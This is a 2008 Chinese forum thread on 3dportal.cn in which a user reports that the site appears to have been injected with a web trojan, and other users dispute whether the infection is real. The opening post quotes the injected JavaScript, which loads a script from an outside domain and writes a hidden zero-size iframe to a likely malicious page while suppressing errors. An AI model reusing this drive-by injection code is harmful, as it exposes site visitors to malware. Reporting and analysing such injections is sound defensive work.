QQ登录

只需一步,快速开始

登录 | 注册 | 找回密码

三维网

 找回密码
 注册

QQ登录

只需一步,快速开始

展开

通知     

全站
11天前
查看: 2111|回复: 16
收起左侧

此网被挂马

[复制链接]
发表于 2008-11-26 14:38:57 | 显示全部楼层 |阅读模式 来自: 中国浙江金华

马上注册,结识高手,享用更多资源,轻松玩转三维网社区。

您需要 登录 才可以下载或查看,没有帐号?注册

x
马:Hack.Exploit.Script.JS.Mixed.c
  1. <script language="javascript" SRC="  ' target=_blank>http://u.cruze3.cn/u.js"></script> ) v1 }1 i3 u6 Z2 ^2 y7 W
  2. ( D, r5 L* A2 Y2 ^; O- m
  3. document.writeln("<script>";
    ( M; J' E7 I, G: ~
  4. document.writeln("function oK_Begin(){";
    * [$ j3 S; u* `& g
  5. document.writeln("var Then = new Date() ";) D( u: `0 d/ L3 e/ H  Q( ~" `2 }
  6. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";( U8 ^2 l6 H) X
  7. document.writeln("var cookieString = new String(document.cookie)";( J  I) q, E6 n+ A
  8. document.writeln("var cookieHeader = "Cookie1=" ";% t7 m' s/ u  A6 \; |
  9. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";: g3 ]1 Z4 X; ], T  ?
  10. document.writeln("if (beginPosition != -1){ ";
    ; f9 Z  o1 o8 _. u8 {3 e" z& f
  11. document.writeln("} else ";
    / y1 R+ C: b$ Q# Y7 O! ~6 V
  12. document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";
    2 v9 V9 P8 R7 z
  13. document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";
    6 l/ K( g& c3 P: m& L- H
  14. document.writeln("}";* f6 C- f5 V' w- q1 u; y7 n* }
  15. document.writeln("}";! Z6 L3 u& B: e" Y0 \6 `& o6 x
  16. document.writeln("oK_Begin();";- _8 E, S0 I) H/ g& s# s) j% B
  17. document.writeln("<\/script>";! h$ s; Y- x. {( b) p# {
  18. document.writeln("<script>window.onerror=function(){return true;}<\/script>"
      g1 p) u, W2 D- Q- j- o$ b9 [
  19. $ s1 d0 [6 m& [8 _) ]
  20. / ?# z+ Z6 ]% i, ?) N4 ?  }
  21. , j* s3 S: I% j& Q& y

  22. & p9 c& K. T; N" @* H0 X
  23. 0 m; l3 h- K9 V: O2 j' U. S0 ]
复制代码
虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马
发表于 2008-11-26 14:44:03 | 显示全部楼层 来自: 中国浙江宁波
请管理员确认是否网页挂马?
发表于 2008-11-26 14:47:52 | 显示全部楼层 来自: 中国江苏南京
我的麦咖啡都没检测出来 你什么杀毒软件?
 楼主| 发表于 2008-11-26 16:16:23 | 显示全部楼层 来自: 中国浙江金华

回复 3# cayuer 的帖子

不是杀软件查的.& M" N% ~8 W- S# p9 }8 |" N1 g
只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马." H; a3 H' w3 _& K6 w9 n# u$ p
不过,已经被清理了.
" H% w7 u& M. c8 h, _
# i9 t" `) x& ^: dHEHE
4 V9 I0 L  z! d5 F: ]% R  F2 ]  x$ T- X8 a- J
[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]
发表于 2008-11-26 18:27:17 | 显示全部楼层 来自: 中国浙江温州
你这个什么网站,哪里出来的?" M( I5 {+ W/ _) o$ N
. K: F; S% ]. `$ p7 f: L, |* \
ht tp://u.cruze3.cn/u.js
 楼主| 发表于 2008-11-27 09:15:28 | 显示全部楼层 来自: 中国浙江金华

回复 5# 江南有雪 的帖子

http://u.cruze3.cn/u.js" S8 n8 k, g* _. @
此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.
1 w# V+ z) v* _1 h7 |2 d这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.! Q9 f7 p- q' o3 \$ Z
HEHE
发表于 2008-11-27 10:26:38 | 显示全部楼层 来自: LAN

回复 6# czy12 的帖子

这跟三维有什么关系?
 楼主| 发表于 2008-11-27 11:01:02 | 显示全部楼层 来自: 中国浙江金华
这是挂在三维网论坛里的.
, `( U( [- }, \# h6 i( e红线所指
moma.jpg
发表于 2008-11-27 11:21:19 | 显示全部楼层 来自: 中国上海
奇怪,为什么我的里面没有?是不是楼主的机器自己带病毒了?
发表于 2008-11-27 11:26:10 | 显示全部楼层 来自: 中国甘肃兰州
自己的机子中毒了,就不要满天喊叫了,没人会认为你是一个杀毒的行家
 楼主| 发表于 2008-11-27 11:34:27 | 显示全部楼层 来自: 中国浙江金华
不学无术.5 |0 s/ z6 a/ x3 K" e# }: t
HEHE
mlm.jpg
发表于 2008-11-27 14:30:45 | 显示全部楼层 来自: 中国香港
但在:
3 }" W7 z  S5 V; `http://www.3dportal.cn/discuz/ 之原
5 o! b9 x( D8 V# J似乎看不见楼主所说的 http://u.cruze3.cn/u.js
5 ~; z+ n+ d$ P3 |; S+ c! l& A3 ^$ I  h* M1 Q1 Q1 G1 n
[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]
发表于 2008-11-27 15:30:58 | 显示全部楼层 来自: 中国山东泰安
经过自编扫描代码处理结果,未发现楼主说的挂马代码!& D0 |& |1 q  `7 I, y

2 E* H$ N3 z, W: X. F7 I请清理自己计算机的缓冲区!
1.JPG
头像被屏蔽
发表于 2008-11-27 15:43:48 | 显示全部楼层 来自: 中国河北衡水
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2008-11-27 15:47:42 | 显示全部楼层 来自: 新加坡

回复 8# czy12 的帖子

看您的尾符/script,很像是U盘病毒。
 楼主| 发表于 2008-11-27 15:50:50 | 显示全部楼层 来自: 中国浙江金华
DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。
% i% X1 k. a3 e9 x我也说了:已修复。
7 L' y9 F$ o  B$ \4 Y+ `# J7 k7 ~8 `& T2 d* A" n& h
ps:这与缓存毫无关系。虽然缓存中有U.JS.
+ F0 `8 D, g, f. i. O- T但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?4 m; X+ s& c& C2 @  Z. T2 }
  `; S! \! H! f( E; F( K( a2 ]
script是个JAVA代码,与U盘何关?: y. c+ O$ E9 G* v, s( w, [& s

' y1 ^2 e" {) Y/ {) ~( AHEHE% `) }& p: t( b' @
& |8 V4 @* e1 P$ L) L/ R& l
[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]
发表于 2008-11-27 16:11:40 | 显示全部楼层 来自: 中国山东泰安
非也,代码是程序直接采样的当时的网页代码,是自编的,算不上权威,但是可以直接进入部分加密网站!, K* o! S' n7 l2 s3 f

0 `- X1 P$ S, A如果却如你说的修改了,我想,这只有论坛管理员有这个权限,即便是后台也是有记录的。假如确实是论坛后台修改了,一定会给大伙一个说法的。$ n. T) `+ l( I% v) m) i7 D% B

( y1 k# n$ A4 C$ z4 h相反,目前从各方面提供的代码显示,确实“此时此刻”是正常的!至于继续讨论已经无大的价值!
发表回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则


Licensed Copyright © 2016-2020 http://www.3dportal.cn/ All Rights Reserved 京 ICP备13008828号

小黑屋|手机版|Archiver|三维网 ( 京ICP备2023026364号-1 )

快速回复 返回顶部 返回列表